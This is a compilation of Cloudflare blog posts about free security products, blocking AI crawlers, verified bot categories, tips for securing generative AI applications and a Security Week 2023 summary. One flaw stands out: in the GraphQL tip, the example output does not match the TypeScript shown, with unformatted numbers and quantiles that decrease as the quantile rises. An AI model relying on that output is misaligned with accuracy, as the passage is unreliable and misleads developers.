The Firebase App Check extension for Turnstile is easy to integrate, allowing developers to quickly enhance app security with minimal setup. This extension is also free with unlimited usage with Turnstile’s free tier. By combining the strengths of Google Firebase's backend services and Cloudflare’s Turnstile, developers can offer a secure and seamless experience for their users.

Cloudflare One

Cloudflare One is a comprehensive Secure Access Service Edge (SASE) platform designed to protect and connect people, apps, devices, and networks across the Internet. It combines services such as Zero Trust Network Access (ZTNA), Secure Web Gateway (SWG), and more into a single solution. Cloudflare One can help everyone secure people and networks, manage access control, protect against cyber threats, safeguard their data, and improve the performance of network traffic by routing it through Cloudflare’s global network. It replaces traditional security measures by offering a cloud-based approach to secure and streamline access to corporate resources.

Everyone now has free access to four new products that have been added to Cloudflare One over the past two years:

Cloud Access Security Broker (CASB) for mitigating SaaS application risk.
Data Loss Prevention (DLP) for protecting sensitive data from leaving your network and SaaS applications.
Digital Experience Monitoring for seeing a user’s experience when they are on any network.
Magic Network Monitoring for seeing all the traffic that flows through your network.

This is in addition to the existing network security products already in the Cloudflare One platform:

Access for verifying users’ identity and only letting them use the applications they’re meant to be using.
Gateway for protecting network traffic that both goes out to the public Internet and into your private network.
Cloudflare Tunnel, our app connectors, which includes both cloudflared and WARP Connector for connecting different applications, servers, and private networks to Cloudflare’s network.
Cloudflare WARP, our device agent, for securely sending traffic from a laptop or mobile device to the Internet.

Anyone with a Cloudflare account will automatically receive 50 free seats across all of these products in their Cloudflare One organization. Visit our Zero Trust & SASE plans page for more information about our free products and to learn about our Pay-as-you-go and Contract plans for teams above 50 members.

Authenticating with Google

The Cloudflare dashboard itself has become a vital resource that needs to be protected, and we spend a lot of time ensuring Cloudflare user accounts do not get compromised.

To do this, we have increased security by adding additional authentication methods including app-based two-factor authentication (2FA), passkeys, SSO, and Sign in with Apple. Today we’re adding the ability to sign up and sign in with a Google account.

Cloudflare supports several authentication workflows tailored to different use cases. While SSO and passkeys are the preferred and most secure methods of authentication, we believe that providing authentication factors that are stronger than passwords will fill a gap and raise overall average security for our users. Signing in with Google makes life easier for our users and prevents them from having to remember yet another password when they’re already browsing the web with a Google identity.

Sign in with Google is based on the OAuth 2.0 specification, and allows Google to securely share identifying information about a given identity while ensuring that it is Google providing this information, preventing any malicious entities from impersonating Google.

This means that we can delegate authentication to Google, preventing zero knowledge attacks directly on this Cloudflare identity.

Upon coming to the Cloudflare Sign In page, you will be presented with the button below. Clicking on it will allow you to register for Cloudflare, and once you are registered, it will allow you to sign in without typing in a password, using any existing protections you have set on your Google account.

With the launch of this capability, Cloudflare now uses its own Cloudflare Workers to provide an abstraction layer for OIDC-compatible identity providers (such as GitHub and Microsoft accounts), which means our users can expect to see more identity provider (IdP) connection support coming in the future.

At this time, only new customers signing up with Google will be able to sign in with their Google account, but we will be implementing this for more of our users going forward, with the ability to link/de-link social login providers, and we will be adding additional social login methods. Enterprise users with an established SSO setup will not be able to use this method at this time, and those with an established SSO setup based on Google Workspace will be forwarded to their SSO flow, as we consider how to streamline the Access and IdP policies that have been set up to lock down your Cloudflare environment.

If you are new to Cloudflare, and have a Google account, it is easier than ever to start using Cloudflare to protect your websites, build a new service, or try any of the other services that Cloudflare provides.

A safer Internet

One of Cloudflare’s goals has always been to democratize cyber security tools, so everyone can provide content and connect to the Internet safely, even without the resources of large enterprise organizations.

We have decided to provide a large set of new features for free to all Cloudflare users, covering a wide range of security use cases, for web administrators, network administrators, and cyber security enthusiasts.

Log in to your Cloudflare account to start taking advantage of these announcements today. We love feedback on our community forums, and we commit to improving both existing features and new features moving forward.

Watch on Cloudflare TV

Declare your AIndependence: block AI bots, scrapers and crawlers with a single click

Alex Bocharov — Wed, 03 Jul 2024 13:00:26 GMT

To help preserve a safe Internet for content creators, we’ve just launched a brand new “easy button” to block all AI bots. It’s available for all customers, including those on our free tier.

The popularity of generative AI has made the demand for content used to train models or run inference on skyrocket, and, although some AI companies clearly identify their web scraping bots, not all AI companies are being transparent. Google reportedly paid $60 million a year to license Reddit’s user generated content, and most recently, Perplexity has been accused of impersonating legitimate visitors in order to scrape content from websites. The value of original content in bulk has never been higher.

Last year, Cloudflare announced the ability for customers to easily block AI bots that behave well. These bots follow robots.txt, and don’t use unlicensed content to train their models or run inference for RAG applications using website data. Even though these AI bots follow the rules, Cloudflare customers overwhelmingly opt to block them.

We hear clearly that customers don’t want AI bots visiting their websites, and especially those that do so dishonestly. To help, we’ve added a brand new one-click to block all AI bots. It’s available for all customers, including those on the free tier. To enable it, simply navigate to the Security > Bots section of the Cloudflare dashboard, and click the toggle labeled AI Scrapers and Crawlers.

This feature will automatically be updated over time as we see new fingerprints of offending bots we identify as widely scraping the web for model training. To ensure we have a comprehensive understanding of all AI crawler activity, we surveyed traffic across our network.

AI bot activity today

The graph below illustrates the most popular AI bots seen on Cloudflare’s network in terms of their request volume. We looked at common AI crawler user agents and aggregated the number of requests on our platform from these AI user agents over the last year:

When looking at the number of requests made to Cloudflare sites, we see that Bytespider, Amazonbot, ClaudeBot, and GPTBot are the top four AI crawlers. Operated by ByteDance, the Chinese company that owns TikTok, Bytespider is reportedly used to gather training data for its large language models (LLMs), including those that support its ChatGPT rival, Doubao. Amazonbot and ClaudeBot follow Bytespider in request volume. Amazonbot, reportedly used to index content for Alexa’s question-answering, sent the second-most number of requests and ClaudeBot, used to train the Claude chat bot, has recently increased in request volume.

Among the top AI bots that we see, Bytespider not only leads in terms of number of requests but also in both the extent of its Internet property crawling and the frequency with which it is blocked. Following closely is GPTBot, which ranks second in both crawling and being blocked. GPTBot, managed by OpenAI, collects training data for its LLMs, which underpin AI-driven products such as ChatGPT. In the table below, “Share of websites accessed” refers to the proportion of websites protected by Cloudflare that were accessed by the named AI bot.

AI Bot	Share of Websites Accessed
Bytespider	40.40%
GPTBot	35.46%
ClaudeBot	11.17%
ImagesiftBot	8.75%
CCBot	2.14%
ChatGPT-User	1.84%
omgili	0.10%
Diffbot	0.08%
Claude-Web	0.04%
PerplexityBot	0.01%

While our analysis identified the most popular crawlers in terms of request volume and number of Internet properties accessed, many customers are likely not aware of the more popular AI crawlers actively crawling their sites. Our Radar team performed an analysis of the top robots.txt entries across the top 10,000 Internet domains to identify the most commonly actioned AI bots, then looked at how frequently we saw these bots on sites protected by Cloudflare.

In the graph below, which looks at disallowed crawlers for these sites, we see that customers most often reference GPTBot, CCBot, and Google in robots.txt, but do not specifically disallow popular AI crawlers like Bytespider and ClaudeBot.

With the Internet now flooded with these AI bots, we were curious to see how website operators have already responded. In June, AI bots accessed around 39% of the top one million Internet properties using Cloudflare, but only 2.98% of these properties took measures to block or challenge those requests. Moreover, the higher-ranked (more popular) an Internet property is, the more likely it is to be targeted by AI bots, and correspondingly, the more likely it is to block such requests.

Top N Internet properties by number of visitors seen by Cloudflare	% accessed by AI bots	% blocking AI bots
10	80.0%	40.0%
100	63.0%	16.0%
1,000	53.2%	8.8%
10,000	47.99%	8.92%
100,000	44.53%	6.36%
1,000,000	38.73%	2.98%

We see website operators completely block access to these AI crawlers using robots.txt. However, these blocks are reliant on the bot operator respecting robots.txt and adhering to RFC9309 (ensuring variations on user against all match the product token) to honestly identify who they are when they visit an Internet property, but user agents are trivial for bot operators to change.

How we find AI bots pretending to be real web browsers

Sadly, we’ve observed bot operators attempt to appear as though they are a real browser by using a spoofed user agent. We’ve monitored this activity over time, and we’re proud to say that our global machine learning model has always recognized this activity as a bot, even when operators lie about their user agent.

Take one example of a specific bot that others observed to be hiding their activity. We ran an analysis to see how our machine learning models scored traffic from this bot. In the diagram below, you can see that all bot scores are firmly below 30, indicating that our scoring thinks this activity is likely to be coming from a bot.

The diagram reflects scoring of the requests using our newest model, where “hotter” colors indicate more requests falling in that band, and “cooler” colors meaning fewer requests did. We can see the vast majority of requests fell into the bottom two bands, showing that Cloudflare’s model gave the offending bot a score of 9 or less. The user agent changes have no effect on the score, because this is the very first thing we expect bot operators to do.

Any customer with an existing WAF rule set to challenge visitors with a bot score below 30 (our recommendation) automatically blocked all of this AI bot traffic with no new action on their part. The same will be true for future AI bots that use similar techniques to hide their activity.

We leverage Cloudflare global signals to calculate our Bot Score, which for AI bots like the one above, reflects that we correctly identify and score them as a “likely bot.”

When bad actors attempt to crawl websites at scale, they generally use tools and frameworks that we are able to fingerprint. For every fingerprint we see, we use Cloudflare’s network, which sees over 57 million requests per second on average, to understand how much we should trust this fingerprint. To power our models, we compute global aggregates across many signals. Based on these signals, our models were able to appropriately flag traffic from evasive AI bots, like the example mentioned above, as bots.

The upshot of this globally aggregated data is that we can immediately detect new scraping tools and their behavior without needing to manually fingerprint the bot, ensuring that customers stay protected from the newest waves of bot activity.

If you have a tip on an AI bot that’s not behaving, we’d love to investigate. There are two options you can use to report misbehaving AI crawlers:

1. Enterprise Bot Management customers can submit a False Negative Feedback Loop report via Bot Analytics by simply selecting the segment of traffic where they noticed misbehavior:

2. We’ve also set up a reporting tool where any Cloudflare customer can submit reports of an AI bot scraping your website without permission.

We fear that some AI companies intent on circumventing rules to access content will persistently adapt to evade bot detection. We will continue to keep watch and add more bot blocks to our AI Scrapers and Crawlers rule and evolve our machine learning models to help keep the Internet a place where content creators can thrive and keep full control over which models their content is used to train or run inference on.

Easily manage AI crawlers with our new bot categories

Reid Tatoris — Fri, 29 Sep 2023 13:00:00 GMT

Today, we’re excited to announce that any Cloudflare user, on any plan, can choose specific categories of bots that they want to allow or block, including AI crawlers.

As the popularity of generative AI has grown, content creators and policymakers around the world have started to ask questions about what data AI companies are using to train their models without permission. As with all new innovative technologies, laws will likely need to evolve to address different parties' interests and what’s best for society at large. While we don’t know how it will shake out, we believe that website operators should have an easy way to block unwanted AI crawlers and to also let AI bots know when they are permitted to crawl their websites.

The good news is that Cloudflare already automatically stops scraper bots today. But we want to make it even easier for customers to be sure they are protected, see how frequently AI scrapers might be visiting their sites, and respond to them in more targeted ways. We also recognize that not all AI crawlers are the same and that some AI companies are looking for clear instructions for when they should not crawl a public website.

Crawler bots are nothing new. Cloudflare already protects you from scraping today.

Web crawlers have been around for a long time. The first, called World Wide Web Wanderer, was developed back in 1993 to measure the size of the web by counting the total number of accessible web pages. This technique led directly to the creation of the first popular search engine, WebCrawler, in 1994.

And still today, the most common use of a web crawler is for a search engine: Google’s GoogleBot. To provide the most relevant results for searches, crawlers like GoogleBot typically start by visiting web pages and retrieving the HTML content. Search engine operators predefine how much of the crawled HTML files is necessary for indexing, and then the files will be parsed to extract components like text, images, metadata, and links. This extracted data will then be stored in a structured format back on Google’s servers. Extracted links (URLs) are the key to how the crawlers discover new websites. The links that were present in the HTML files are added to a queue of URLs for the crawlers to visit and parse. And URLs are pretty easily spread around the Internet making it easy for crawlers to discover new sites. It can even be a URL that appeared in a referrer header that was stored and published by another web server. This process of following links, parsing, and storing data is recursively repeated allowing search engines to map out the web. All this collected data is then indexed to allow for efficient searching and retrieval of information.

While search engine crawler operations are generally beneficial for a site owner to get their site discovered, there are bot operators that use similar techniques for more malicious purposes such as price scraping to undercut competitor pricing or theft of copyrighted material such as images.

The techniques deployed by AI crawlers are no different. Just like a search engine crawler, they’ll parse HTML content and follow extracted URLs to gather available information. But instead of using it to index the web, this content will be applied as training data for their ML models.

Cloudflare identifies both good and bad crawlers using various systems such as attack signature matching, heuristics, machine learning, and behavioral analysis. All Cloudflare customers using Bot Fight Mode, Super Bot Fight Mode, or Bot Management are already protected from malicious crawlers.

Along with our bot detection tools, we also have a Verified Bot directory that allows responsible and necessary bots, like GoogleBot, to register to be segmented into their own separate detections (fill out a request here if you have a bot you think should be added). We’ve added new functionality to that directory to give our customers more control.

Available now: segment known bots with flexibility and precision

Our new Verified Bot categories are now available in the Cloudflare Rules Engine and Workers. With this granular bot categorization, Cloudflare users get better bot segmentation, and can choose specific responses to specific types of bots. To take advantage of these new bot categories, simply log in to the Cloudflare dash, go to the WAF tab, create a rule, and choose one of the Verified Bot sub categories as the Field.

The new categories include:

Search Engine Crawler,
Aggregator,
AI Crawler,
Page Preview,
Advertising
Academic Research,
Accessibility,
Feed Fetcher,
Security,
Webhooks.

You can also view all the available categories using the Cloudflare API.

curl --request GET 'https://api.cloudflare.com/client/v4/bots_directory/categories' \
  --header "X-Auth-Email: " \
  --header "X-Auth-Key: " \

More targeted responses can be useful in a variety of situations. A few examples include:

If you are a content creator, and you’re concerned about your work being reproduced by AI services, you can block AI bots we have cataloged in a simple firewall rule, while still allowing search engine crawlers to index your site.
If your content is frequently shared on social media, you may want to use Workers to serve a simplified version of the page to Page Preview services, like the services that X (formerly Twitter), Discord and Slack are using to render a thumbnail version of a web page.
If you run an online store that processes payments through webhooks API, you can harden your site’s security by only allowing verified webhooks services to make a request to that API endpoint.
If you are using Cloudflare’s Load Balancing service and have limited in-region capacity, you can use Custom Rules for Load Balancing to send all bots except Search Engine Crawlers to a backup pool, prioritizing critical visitors over non-critical automated services.

Above all, these new categories give you, the website owner, complete, granular control over not only whether bots can visit your site, but what specific types of bots can and can’t do. For those of you that simply don’t want any bots, no problem, you don’t have to make any changes. Your existing rules that reference bot score or our Verified bots change will not be impacted at all.

More than just blocking, encouraging good behavior to make the Internet better

At Cloudflare, we have a history of working with good bot operators (like GoogleBot), who respect Internet norms and best practices, to access the websites that want to allow them. We want to encourage good behavior by AI crawlers as well, so we have developed a set of criteria that will allow us to tag respectful AI bots differently. In order to be tagged as a respectful AI bot, AI crawler must take the following steps to show they are acting in good faith:

Maintain a public web page committing to respect robots.txt.

Set IPs that are used solely by the bot and are verifiable via a public IP list, reverse DNS lookup, or ASN ownership.
Maintain a unique and stable user-agent to represent the bot.
Respect a robots.txt entry for your user-agent as well as wild-card entries.
Requiring all AI crawlers to respect crawl-delay, which has previously been a nonstandard extension.

These steps are an expansion of our existing Verified Bots policy which you can see here. When a bot creator has performed the steps above, we perform additional evaluation to confirm we’ve seen no suspicious activity from the bot. We check the bot's documentation, check internal dashboards to ensure traffic is appropriately distributed across the sites we protect, and check whether the bot hits suspicious endpoints like logins, or has exhibited other malicious activity.

While new AI bots can be scary, this industry is evolving incredibly quickly, and you may want to handle different bots differently in the future. We think it's important to distinguish between bot operators that are being respectful and those that are trying to be deceptive.

It should be easy for everyone to deal with AI crawlers, not just Cloudflare customers

While we’re glad we’ve made it easy for Cloudflare customers to manage AI Crawlers, not everyone uses Cloudflare. We want the Internet to be better for everyone. So we think that the industry should adopt a new protocol specifically for handling AI crawlers.

In the long run, AI bots respecting a new exclusion protocol gives website operators the most flexibility to change how they want to handle them over time. We think the key is to make it easier for customers to block these bots, or to allow them in some cases if they choose on their entire website or only on specific pages.

You’ll be hearing more about this from us in the next few months, so stay tuned.

But we didn’t want to wait to make sure our customers are protected, so we're making our new bot categories available today!

What’s next?

The first and most important step for us was to make it clear to every Cloudflare customer that you are already protected from AI crawlers you don’t want. Second, we wanted to give you granular control and make it easy to allow those crawlers, or other bots, that you deem useful for your site.

We encourage everyone to try out our new Verified Bot categories today. Log in to the Cloudflare dash, go to the WAF tab, create a rule, and choose one of the Verified Bot sub categories as the `Field`. And remember, this functionality is available to all Cloudflare customers, even on free plans.

Having launched Verified Bot categories, in the next few months we’ll be adding more detailed reporting based on the bot category, to better help you visualize the frequency at which different categories of bots are visiting your site over time. As AI continues to evolve at a breakneck pace, AI Crawlers are only going to become a larger part of the Internet. As that evolution happens, Cloudflare will be there every step of the way to help you evolve the way you deal with them.

How to secure Generative AI applications

Reid Tatoris — Thu, 18 May 2023 13:00:13 GMT

I remember when the first iPhone was announced in 2007. This was NOT an iPhone as we think of one today. It had warts. A lot of warts. It couldn’t do MMS for example. But I remember the possibility it brought to mind. No product before had seemed like anything more than a product. The iPhone, or more the potential that the iPhone hinted at, had an actual impact on me. It changed my thinking about what could be.

In the years since no other product came close to matching that level of awe and wonder. That changed in March of this year. The release of GPT-4 had the same impact I remember from the iPhone launch. It’s still early, but it's opened the imagination, and fears, of millions of developers in a way I haven’t seen since that iPhone announcement.

That excitement has led to an explosion of development and hundreds of new tools broadly grouped into a category we call generative AI. Generative AI systems create content mimicking a particular style. New images that look like Banksy or lyrics that sound like Taylor Swift. All of these Generative AI tools, whether built on top of GPT-4 or something else, use the same basic model technique: a transformer.

Attention is all you need

GPT-4 (Generative Pretrained Transformer) is the most advanced version of a transformer model. Transformer models all emerged from a seminal paper written in 2017 by researchers at the University of Toronto and the team at Google Brain, titled Attention is all you need. The key insight from the paper is the self-attention mechanism. This mechanism replaced recurrent and convolutional layers, allowing for faster training and better performance.

The secret power of transformer models is their ability to efficiently process large amounts of data in parallel. It's the transformers' gargantuan scale and extensive training that makes them so appealing and versatile, turning them into the Swiss Army knife of natural language processing. At a high level, Large Language Models (LLMs) are just transformer models that use an incredibly large number of parameters (billions), and are trained on incredibly large amounts of unsupervised text (the Internet). Hence large, and language.

Groundbreaking technology brings groundbreaking challenges

Unleashing the potential of LLMs in consumer-facing AI tools has opened a world of possibilities. But possibility also means new risk: developers must now navigate the unique security challenges that arise from making powerful new tools widely available to the masses.

First and foremost, consumer-facing applications inherently expose the underlying AI systems to millions of users, vastly increasing the potential attack surface. Since developers are targeting a consumer audience, they can't rely on trusted customers or limit access based on geographic location. Any security measure that makes it too difficult for consumers to use defeats the purpose of the application. Consequently, developers must strike a delicate balance between security and usability, which can be challenging.

The current popularity of AI tools makes explosive takeoff more likely than in the past. This is great! Explosive takeoff is what you want! But, that explosion can also lead to exponential growth in costs, as the computational requirements for serving a rapidly growing user base can become overwhelming.

In addition to being popular, Generative AI apps are unique in that calls to them are incredibly resource intensive, and therefore expensive for the owner. In comparison, think about a more traditional API that Cloudflare has protected for years. A product API. Sites don’t want competitors calling their product API and scraping data. This has an obvious negative business impact. However, it doesn’t have a direct infrastructure cost. A product list API returns a small amount of text. An attacker calling it 4 million times will have a negligible cost to an infrastructure bill. But generative models can cost cents, or in the case of image generation even tens of cents per call. An attacker gaining access and generating millions of calls has a real cost impact to the developers providing those APIs.

Not only are the costs for generating content high, but the value that end users are willing to pay is high as well. Customers tell us that they have seen multiple instances of bad actors accessing an API without paying, then reselling the content they generate for 50 cents or more per call. The huge monetary opportunity of exploitation means attackers are highly motivated to come back again and again, refactoring their approach each time.

Last, consumer-facing LLM applications are generally designed as a single entry point for customers, almost always accepting query text as input. The open-text nature of these calls makes it difficult to predict the potential impact of a single request. For example, a complex query might consume significant resources or trigger unexpected behavior. While these APIs are not GraphQL based, the challenges are similar. When you accept unstructured submissions, it's harder to create any type of rule to prevent abuse.

Tips for protecting your Generative AI application

So you've built the latest generative AI sensation, and the world is about to be taken by storm. But that success is also about to make you a target. What's the trick to stopping all those attacks you’re about to see? Well, unfortunately there isn’t one. For all the reasons above, this is a hard, persistent problem with no simple solution. But, we’ve been fortunate to work with many customers who have had that target on their back for months, and we’ve learned a lot from that experience. Here are some recommendations that will give you a good foundation for making sure that you, and only you, reap the rewards of your hard work.

1. Enforce tokens for each user. Enforcing usage based on a specific user or user session is straightforward. But sometimes you want to allow anonymous usage. While anonymous usage is great for demos and testing, it can lead to abuse. If you must allow anonymous usage, create a “stickier” identification scheme that persists browser restarts and incognito mode. Your goal isn’t to track specific users, but instead to understand how much an anonymous user has already used your service so far in demo / free mode.

2. Manage quotas carefully. Your service likely incurs costs and charges users per API call, so it likely makes sense to set a limit on the number of times any user can call your API. You may not ever intend for the average user to hit this limit, but having limits in place will protect against that user’s API key becoming compromised and shared amongst many users. It also protects against programming errors that could result in 100x or 1000x expected usage, and a large unexpected bill to the end user.

3. Block certain ASNs (autonomous system numbers) wholesale. Blocking ASNs, or even IPs wholesale is an incredibly blunt tool. In general Cloudflare rarely recommends this approach to customers. However, when tools are as popular as some generative AI applications, attackers are highly motivated to send as much traffic as possible to those applications. The fastest and cheapest way to accomplish this is through data centers that usually share a common ASN. Some ASNs belong to ISPs, and source traffic from people browsing the Internet. But other ASNs belong to cloud compute providers, and mainly source outbound traffic from virtual servers. Traffic from these servers can be overwhelmingly malicious. For example, several of our customers have found ASNs where 88-90% of the traffic turns out to be automated, while this number is usually only 30% for average traffic. In cases this extreme, blocking entire ASNs can make sense.

4. Implement smart rate limits. Counting not only requests per minute and requests per session, but also IPs per token and tokens per IP can guard against abuse. Tracking how many different IPs are using a particular token at any one time can alert you to a user's token being leaked. Similarly, if one IP is rotating through tokens, looking at each token’s session traffic would not alert you to the abuse. You’d need to look at how many tokens that single IP is generating in order to pinpoint that specific abusive behavior.

5. Rate limit on something other than the user. Similar to enforcing tokens on each user, your real time rate limits should also be set on your sticky identifier.

6. Have an option to slow down attackers. Customers often think about stopping abuse in terms of blocking traffic from abusers. But blocking isn’t the only option. Attacks not only need to be successful, they also need to be economically feasible. If you can make requests more difficult or time-consuming for abusers, you can ruin their economics. You can do this by implementing a waiting room, or by challenging users. We recommend a challenge option that doesn’t give real users an awful experience. Challenging users can also be quickly enabled or disabled as you see abuse spike or recede.

7. Map and analyze sequences. By sampling user sessions that you suspect of abuse, you can inspect their requests path-by-path in your SIEM. Are they using your app as expected? Or are they circumventing intended usage? You might benefit from enforcing a user flow between endpoints.

8. Build and validate an API schema. Many API breaches happen due to permissive schemas. Users are allowed to send in extra fields in requests that grant them too many privileges or allow access to other users’ data. Make sure you build a verbose schema that outlines what intended usage is by identifying and cataloging all API endpoints, then making sure all specific parameters are listed as required and have type limits to them.

We recently went through the transition to an OpenAPI schema ourselves for api.cloudflare.com. Our schema looks like this:

/zones:
    get:
      description: List, search, sort, and filter your zones.
      operationId: zone-list-zones
      responses:
        4xx:
          content:
            application/json:
              schema:
                allOf:
                - $ref: '#/components/schemas/components-schemas-response_collection'
                - $ref: '#/components/schemas/api-response-common-failure'
          description: List Zones response failure
        "200":
          content:
            application/json:
              schema:
                $ref: '#/components/schemas/components-schemas-response_collection'
          description: List Zones response
      security:
      - api_email: []
        api_key: []
      summary: List Zones
      tags:
      - Zone
      x-cfPermissionsRequired:
        enum:
        - '#zone:read'
      x-cfPlanAvailability:
        business: true
        enterprise: true
        free: true
        pro: true

9. Analyze the depth and complexity of queries. Are your APIs driven by GraphQL? GraphQL queries can be a source of abuse since they allow such free-form requests. Large, complex queries can grow to overwhelm origins if limits aren’t in place. Limits help guard against outright DoS attacks as well as developer error, keeping your origin healthy and serving requests to your users as expected.

For example, if you have statistics about your GraphQL queries by depth and query size, you could execute this TypeScript function to analyze them by quantile:

import * as ss from 'simple-statistics';

function calculateQuantiles(data: number[], quantiles: number[]): {[key: number]: string} {
    let result: {[key: number]: string} = {};
    for (let q of quantiles) {
        // Calculate quantile, convert to fixed-point notation with 2 decimal places
        result[q] = ss.quantile(data, q).toFixed(2);
    }
    return result;
}

// Example usage:
let queryDepths = [2, 2, 2, 2, 2, 2, 2, 4, 4, 4, 4, 4, 1, 1, 1, 1, 1, 1, 1, 1];
let querySizes = [11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2];

console.log(calculateQuantiles(queryDepths, [0.5, 0.75, 0.95, 0.99]));
console.log(calculateQuantiles(querySizes, [0.5, 0.75, 0.95, 0.99]));

The results give you a sense for the depth of the average query hitting your endpoint, grouped by quantile:

{ '0.5': 2, '0.75': 3, '0.95': 4, '0.99': 4 }
{ '0.5': 6.5, '0.75': 2, '0.95': 2, '0.99': 2 }

Actual data from your production environment would provide a threshold to start an investigation into which queries to further log or limit. A simpler option is to use a query analysis tool, like Cloudflare’s, to make the process automatic.

10. Use short-lived access tokens and long-lived refresh tokens upon successful authentication of your users. Implement token validation in a middleware layer or API Gateway, and be sure to have a dedicated token renewal endpoint in your API. JSON Web Tokens (JWTs) are popular choices for these short-lived tokens. When access tokens expire, allow users to obtain new ones using their refresh tokens. Revoke refresh tokens when necessary to maintain system security. Adopting this approach enhances your API's security and user experience by effectively managing access and mitigating the risks associated with compromised tokens.

11. Communicate directly with your users. All of the above recommendations are going to make it a bit more cumbersome for some of your customers to use your product. You are going to get complaints. You can reduce these by first, giving clear communication to your users explaining why you put these measures in place. Write a blog about what security measures you did and did not decide to implement and have dev docs explaining troubleshooting steps to resolve. Second, give your users concrete steps they can take if they are having trouble, and a clear way to contact you directly. Feeling inconvenienced can be frustrating, but feeling stuck can lose you a customer.

Conclusion: this is the beginning

Generative AI, like the first iPhone, has sparked a surge of excitement and innovation. But that excitement also brings risk, and innovation brings new security holes and attack vectors. The broadness and uniqueness of generative AI applications in particular make securing them particularly challenging. But as every scout knows, being prepared ahead of time means less stress and worry during the journey. Implementing the tips we've shared can establish a solid foundation that will let you sit back and enjoy the thrill of building something special, rather than worrying what might be lurking around the corner.

To learn more about how you can put some of these recommendations into practice, check out our developer platform, API Security, and Rate Limiting products.

Watch on Cloudflare TV

Everything you might have missed during Security Week 2023

Reid Tatoris — Mon, 20 Mar 2023 13:00:00 GMT

Security Week 2023 is officially in the books. In our welcome post last Saturday, I talked about Cloudflare’s years-long evolution from protecting websites, to protecting applications, to protecting people. Our goal this week was to help our customers solve a broader range of problems, reduce external points of vulnerability, and make their jobs easier.

We announced 34 new tools and integrations that will do just that. Combined, these announcement will help you do five key things faster and easier:

Making it easier to deploy and manage Zero Trust everywhere
Reducing the number of third parties customers must use
Leverage machine learning to let humans focus on critical thinking
Opening up more proprietary Cloudflare threat intelligence to our customers
Making it harder for humans to make mistakes

And to help you respond to the most current attacks in real time, we reported on how we’re seeing scammers use the Silicon Valley Bank news to phish new victims, and what you can do to protect yourself.

In case you missed any of the announcements, take a look at the summary and navigation guide below.

Monday

Blog	Summary
Top phished brands and new phishing and brand protections	Today we have released insights from our global network on the top 50 brands used in phishing attacks coupled with the tools customers need to stay safer. Our new phishing and brand protection capabilities, part of Security Center, let customers better preserve brand trust by detecting and even blocking “confusable” and lookalike domains involved in phishing campaigns.
How to stay safe from phishing	Phishing attacks come in all sorts of ways to fool people. Email is definitely the most common, but there are others. Following up on our Top 50 brands in phishing attacks post, here are some tips to help you catch these scams before you fall for them.
Locking down your JavaScript: positive blocking with Page Shield policies	Page Shield now ensures only vetted and secure JavaScript is being executed by browsers to stop unwanted or malicious JavaScript from loading to keep end user data safer.
Cloudflare Aegis: dedicated IPs for Zero Trust migration	With Aegis, customers can now get dedicated IPs from Cloudflare we use to send them traffic. This allows customers to lock down services and applications at an IP level and build a protected environment that is application, protocol, and even IP-aware.
Mutual TLS now available for Workers	mTLS support for Workers allows for communication with resources that enforce an mTLS connection. mTLS provides greater security for those building on Workers so they can identify and authenticate both the client and the server helps protect sensitive data.
Using Cloudflare Access with CNI	We have introduced an innovative new approach to secure hosted applications via Cloudflare Access without the need for any installed software or custom code on application servers.

Tuesday

Blog	Summary
No hassle migration from Zscaler to Cloudflare One with The Descaler Program	Cloudflare is excited to launch the Descaler Program, a frictionless path to migrate existing Zscaler customers to Cloudflare One. With this announcement, Cloudflare is making it even easier for enterprise customers to make the switch to a faster, simpler, and more agile foundation for security and network transformation.
The state of application security in 2023	For Security Week 2023, we are providing updated insights and trends related to mitigated traffic, bot and API traffic, and account takeover attacks.
Adding Zero Trust signals to Sumo Logic for better security insights	Today we’re excited to announce the expansion of support for automated normalization and correlation of Zero Trust logs for Logpush in Sumo Logic’s Cloud SIEM. Joint customers will reduce alert fatigue and accelerate the triage process by converging security and network data into high-fidelity insights.
Cloudflare One DLP integrates with Microsoft Information Protection labels	Cloudflare One now offers Data Loss Prevention (DLP) detections for Microsoft Purview Information Protection labels. This extends the power of Microsoft’s labels to any of your corporate traffic in just a few clicks.
Scan and secure Atlassian with Cloudflare CASB	We are unveiling two new integrations for Cloudflare CASB: one for Atlassian Confluence and the other for Atlassian Jira. Security teams can begin scanning for Atlassian- and Confluence-specific security issues that may be leaving sensitive corporate data at risk.
Zero Trust security with Ping Identity and Cloudflare Access	Cloudflare Access and Ping Identity offer a powerful solution for organizations looking to implement Zero Trust security controls to protect their applications and data. Cloudflare is now offering full integration support, so Ping Identity customers can easily integrate their identity management solutions with Cloudflare Access to provide a comprehensive security solution for their applications

Wednesday

Blog	Summary
Announcing Cloudflare Fraud Detection	We are excited to announce Cloudflare Fraud Detection that will provide precise, easy to use tools that can be deployed in seconds to detect and categorize fraud such as fake account creation or card testing and fraudulent transactions. Fraud Detection will be in early access later this year, those interested can sign up here.
Automatically discovering API endpoints and generating schemas using machine learning	Customers can use these new features to enforce a positive security model on their API endpoints even if they have little-to-no information about their existing APIs today.
Detecting API abuse automatically using sequence analysis	With our new Cloudflare Sequence Analytics for APIs, organizations can view the most important sequences of API requests to their endpoints to better understand potential abuse and where to apply protections first.
Using the power of Cloudflare’s global network to detect malicious domains using machine learning	Read our post on how we keep users and organizations safer with machine learning models that detect attackers attempting to evade detection with DNS tunneling and domain generation algorithms.
Announcing WAF Attack Score Lite and Security Analytics for business customers	We are making the machine learning empowered WAF and Security analytics view available to our Business plan customers, to help detect and stop attacks before they are known.
Analyze any URL safely using the Cloudflare Radar URL Scanner	We have made Cloudflare Radar’s newest free tool available, URL Scanner, providing an under-the-hood look at any webpage to make the Internet more transparent and secure for all.

Thursday

Blog	Summary
Post-quantum crypto should be free, so we’re including it for free, forever	One of our core beliefs is that privacy is a human right. To achieve that right, we are announcing that our implementations of post-quantum cryptography will be available to everyone, free of charge, forever.
No, AI did not break post-quantum cryptography	The recent news reports of AI cracking post-quantum cryptography are greatly exaggerated. In this blog, we take a deep dive into the world of side-channel attacks and how AI has been used for more than a decade already to aid it.
Super Bot Fight Mode is now configurable	We are making Super Bot Fight Mode even more configurable with new flexibility to allow legitimate, automated traffic to access their site.
How Cloudflare and IBM partner to help build a better Internet	IBM and Cloudflare continue to partner together to help customers meet the unique security, performance, resiliency and compliance needs of their customers through the addition of exciting new product and service offerings.
Protect your key server with Keyless SSL and Cloudflare Tunnel integration	Customers will now be able to use our Cloudflare Tunnels product to send traffic to the key server through a secure channel, without publicly exposing it to the rest of the Internet.

Friday

Blog	Summary
